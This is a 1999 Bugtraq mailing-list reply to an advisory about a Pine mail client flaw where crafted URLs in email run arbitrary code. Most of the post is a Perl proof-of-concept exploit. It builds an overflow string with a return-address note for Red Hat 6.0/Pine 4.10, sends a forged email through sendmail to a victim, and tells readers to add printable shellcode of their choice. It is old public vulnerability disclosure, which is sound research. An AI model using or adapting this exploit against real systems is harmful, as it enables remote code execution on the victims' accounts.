[12705] in bugtraq
Re: Caldera Pine Advisory
daemon@ATHENA.MIT.EDU (CyberPsychotic)
Tue Nov 23 15:11:26 1999
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Message-Id: <Pine.LNX.4.10.9911182130180.445-100000@epr0.org>
Date: Thu, 18 Nov 1999 21:43:14 +0500
Reply-To: CyberPsychotic <fygrave@EPR0.ORG>
From: CyberPsychotic <fygrave@EPR0.ORG>
X-To: Alfred Huger <ah@SECURITYFOCUS.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: <Pine.GSO.4.10.9911220905570.11718-100000@www.securityfocus.com>
~ : Versions of pine prior to 4.21 had a security problem when viewing
~ : URLs. By sending an email with a specially formatted URL embedded
~ : in it, an attacker could cause arbitrary shell code to be executed
~ : under the account of the victim user.
~ :
I don't know how dumb user should be to actually to become a victim of
such exploitation. Not saying that the bug shouldn't be fixed anywayz.
if anyone's interested:
#!/usr/bin/perl
$sploit="A" x 1078;
$sploit .="\@1111"; # rh 6.0/pine4.10 would love return address 0x82d4528
# or higher..
open(FOO,"| /usr/sbin/sendmail -t");
print FOO "From: bogus\@yahoo.com\nTo: victim\@somehost\n\n";
print FOO "Mail me: mailto:$sploit";
close(FOO);
pull any shellcode you like (but mind it should contain only printable
characters 0x20-xff worked for me).
-Fyodor
